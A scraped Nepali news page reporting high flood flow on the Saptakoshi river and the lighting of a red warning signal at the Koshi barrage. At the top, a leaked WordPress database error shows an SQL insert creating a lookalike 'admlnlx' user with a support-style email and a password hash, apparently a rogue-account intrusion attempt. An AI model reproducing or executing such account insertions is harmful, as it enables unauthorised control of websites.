WordPress database error: [Duplicate entry '0' for key 'PRIMARY']
INSERT INTO `gi_users` (`user_pass`, `user_nicename`, `user_email`, `user_url`, `user_registered`, `user_activation_key`, `display_name`, `user_login`) VALUES ('$P$BO/YstlyzoOwbKY1PiLDE3Vv16tNoV0', 'admlnlx', 'wordpresupport@gaulekhabar.com', '', '2026-02-04 06:29:44', '', 'admlnlx', 'admlnlx')

सप्तकोशी नदीमा पानीको बहाव उच्च भएपछी रातो बत्ती बालियाे – Gaule Khabar

सप्तकोशी नदीमा पानीको बहाव उच्च भएपछी रातो बत्ती बालियाे

सप्तकोशी नदीमा पानीको बहाव उच्च भएपछी रातो बत्ती बालियाे

गाउँले न्युज, २७ असार, राजविराज / सप्तकोशी नदीमा पानीको बहाव उच्च भएपछी खतराको संकेत स्वरुप रातो बत्ती बालिएको छ । विगत ४ दिनदेखि परेको अविरल वर्षाले नदीमा पानीको बहाव बढेको हो ।

कोशीव्यारेज कनट्रोल रुमले सप्तकोशीमा शुक्रबार बिहान ७ बजे पानीको बहाव प्रतिसेकण्ड १ लाख ६५ हजार ७२० क्युसेक पुगेको जनाएको छ जुन बहाव अघिल्ला दिनको तुलनामा बढी हो ।ब्यारेजका ३२ वटा ढोका खोलिएका छन्।

अहिले बहाब बढ्ने क्रम रहेको जिल्ला प्रहरी कार्यलय सुनसरीका डीएसपी ज्ञानेन्द्र फ्युयालले जानकारी दिए। कोशी नदीका लागि वर्षातको समयमा यतिको बहाव सामान्य मानिन्छ।

१ लाख ५० हजार क्युसेक प्रतिसेकेण्ड नाघेको खण्डमा कोशीको बहावलाई प्रारम्भिक सावधानी सूचकको रुपमा लिने गरिन्छ।

सभार:सिखरपोस्ट

तपाइको प्रतिक्रिया दिनुहोस्

Your email address will not be published. Required fields are marked *

हामी तपाईंको इमे अरू सैसँग साझा र्दैनं।

ट्रेन्डिङ

धेरै कमेन्ट गरिएका